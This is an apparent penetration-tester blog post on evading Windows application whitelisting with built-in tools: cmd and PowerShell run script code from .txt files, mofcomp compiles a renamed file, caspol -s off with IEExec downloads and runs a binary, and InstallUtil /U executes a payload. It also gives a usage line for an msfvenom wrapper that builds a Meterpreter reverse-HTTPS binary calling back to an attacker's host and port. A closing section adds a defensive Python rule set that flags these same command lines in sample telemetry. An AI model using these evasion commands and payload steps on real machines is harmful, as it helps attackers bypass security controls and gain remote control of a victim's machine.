I had been sitting on this for a while. Really. I was just waiting for the opportunity to present itself for my colleague and me to throw the proverbial kitchen sink at an application-whitelisted machine. Ever since this [talk], performing a practical “real-world” test of these whitelist evasion techniques has been #1 on my TO-DO list. And finally, the opportunity presented itself. Also, much like any post lately, there is some cool code (on my [github] finally! yay!)
Or… how to evade silly file extension blocks. The examples from subTee’s talk also worked very admirably in our tests. The key here is that this can be expanded beyond batch, vba, and ps1. For example, the update to my [mof persist module] incorporates this trick: mofcomp is called to execute against a text file with a .txt extension rather than .mof, which is often blocked. A few examples:
C:\> cmd.exe /K < something.txt
C:\> powershell -exec Bypass -c "Get-Content test.txt | iex"
C:\> mofcomp moftest.txt
Powershell, in general, is usually a good candidate for evading application whitelisting, i.e. the basis for this [blogpost]. However, in case powershell is booby-trapped by a security appliance (which I did see during this last test), the following .NET sponsors may aid in evasion.
If you have administrative privileges, then this sponsor seems to work very well. The trick to get anything that touches the disk to run is to temporarily disable .NET security policies via caspol:
C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s off
Once this has been done, IEExec will download and execute a .NET binary. Below is what appears in TCPView and Process Explorer:
Without administrative privileges (or with caspol still enabled), we observe different behavior. We can get a WinForm with “hello world” to open, but anything useful such as file read/write, executing a binary, or even calling the OpenFileDialog class causes a “System.Net.Security” access violation. The crazy thing here, though, is that calling System.Net.WebClient and downloading a string is allowed, leaving room to at least pull in strings from webpages.
Maybe this could provide an attack vector for gaining remote code execution of an untrusted binary (for example, a sandbox escape as in MS14-009)? The skeleton application & source I used to perform these tests can be found [here].
Another weird caveat is that on default Win7 x64, IEExec will error out attempting to run a 32-bit PE (even from the non-64-bit Framework directory). While there may be ways to force 32-bit mode (corflags from the SDK), the tool may not be present on the system and may also require administrative privileges.
Uses the System.Configuration.Install .NET class. The code that gets executed is whatever runs under the /Uninstall flag. The main class is never called when InstallUtil is run with the /Uninstall flag, so diversionary garbage could be added to complicate reversing of the binary! Another plus is that InstallUtil does not seem to require admin to run, and nothing other than the binary is required for successful execution. The trick is how to get the binary on disk (this is an exercise for the reader, but a few hints: Bitsadmin, powershell download, etc…). To leverage this, one would simply build a .NET binary that has an instance of System.Configuration.Install with an Uninstall class, compiled for the correct architecture and target framework. Then simply push the binary to disk and execute:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U uninstall.exe
So what does this .NET binary need to look like? Well, subTee was kind enough to produce a template [here]. Taking the template from the IEExec blogpost from infosecsmith2 [here], we can very easily push msfvenom output into this source and generate our binary. But alas, there should be a way to automate all of this. Enter python to the rescue (I still write in python from time to time)! Looking for an all-in-one solution that would generate and compile the binary in a linux environment, this [script] requires mono (mcs), python, and metasploit (msfvenom). The easiest way to ensure these are present is to install [Veil-Evasion], as these are also the requirements needed to compile any of the c# packages. The syntax to push out a binary is as follows:
Usage: python InstallUtil.py [--cs_file cs_filename] [--exe_name exe_filename] [--payload payload] [--lhost lhost] [--lport lport]
python InstallUtil.py --cs_file temp.cs --exe_name temp.exe --payload windows/meterpreter/reverse_https --lhost 192.168.1.11 --lport 443
Also, check out [Malwaria] from subTee, which can accomplish the same thing by packing a dll inside the binary, and so much more. As of this draft, I had yet to do more than insert an msfvenom-generated dll, but I am fairly certain any dll would suffice to perform whatever your hacker heart desires 🙂
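On the flip side, every sponsor above leaves a distinctive process-creation trail (cmd.exe reading a .txt, Get-Content piped into iex, caspol -s off, IEExec launched against a URL, InstallUtil with /U, mofcomp fed a non-.mof file). The following is an added example, not code from this post or the author’s github, showing how a defender could flag those patterns in process-creation telemetry; the event tuples are constructed sample data and the rule names are my own.

```python
import re
from typing import Callable, Dict, List, Tuple

def _rx(pattern: str) -> Callable[[str], bool]:
    """Build a case-insensitive command-line matcher from a regex."""
    compiled = re.compile(pattern, re.IGNORECASE)
    return lambda cmd: compiled.search(cmd) is not None

def _mofcomp_non_mof(cmd: str) -> bool:
    """mofcomp normally compiles .mof files; any other input extension is suspicious."""
    args = cmd.split()
    return len(args) > 1 and not args[-1].lower().endswith(".mof")

# (rule name, image-path regex, command-line predicate), one per behaviour described in the post
RULES: List[Tuple[str, str, Callable[[str], bool]]] = [
    ("cmd-script-from-txt",   r"\\cmd\.exe$",         _rx(r'/k\s*<\s*"?[^"\s]+\.txt')),
    ("powershell-gc-iex",     r"\\powershell\.exe$",  _rx(r"get-content.*\|\s*(iex|invoke-expression)\b")),
    ("caspol-security-off",   r"\\caspol\.exe$",      _rx(r"\s-(s|security)\s+off\b")),
    ("ieexec-remote-launch",  r"\\ieexec\.exe$",      _rx(r"https?://")),
    ("installutil-uninstall", r"\\installutil\.exe$", _rx(r"(^|\s)/u(ninstall)?\b")),
    ("mofcomp-non-mof-input", r"\\mofcomp\.exe$",     _mofcomp_non_mof),
]

def classify(image: str, cmdline: str) -> List[str]:
    """Return the names of every rule the event matches (empty list means nothing flagged)."""
    return [name for name, img_rx, pred in RULES
            if re.search(img_rx, image, re.IGNORECASE) and pred(cmdline)]

def scan(events: List[Tuple[str, str]]) -> Dict[int, List[str]]:
    """Map the index of each flagged event to the rules it triggered."""
    hits: Dict[int, List[str]] = {}
    for i, (image, cmdline) in enumerate(events):
        matched = classify(image, cmdline)
        if matched:
            hits[i] = matched
    return hits

# Constructed sample process-creation events (image path, command line); not real telemetry
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\cmd.exe", "cmd.exe /K < something.txt"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell -exec Bypass -c "Get-Content test.txt | iex"'),
    (r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe", "caspol -s off"),
    (r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\IEExec.exe", "IEExec http://example.invalid/app.exe"),
    (r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe",
     "InstallUtil.exe /logfile= /LogToConsole=false /U uninstall.exe"),
    (r"C:\Windows\System32\wbem\mofcomp.exe", "mofcomp moftest.txt"),
    (r"C:\Windows\System32\wbem\mofcomp.exe", r"mofcomp C:\Windows\System32\wbem\cimwin32.mof"),  # benign
    (r"C:\Windows\System32\notepad.exe", "notepad.exe readme.txt"),  # benign
]

if __name__ == "__main__":
    for idx, names in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {SAMPLE_EVENTS[idx][1]!r} -> {names}")
```

The image-path check keeps the rules from firing on unrelated binaries that merely mention these tools on their command line; the two benign events at the end exercise that.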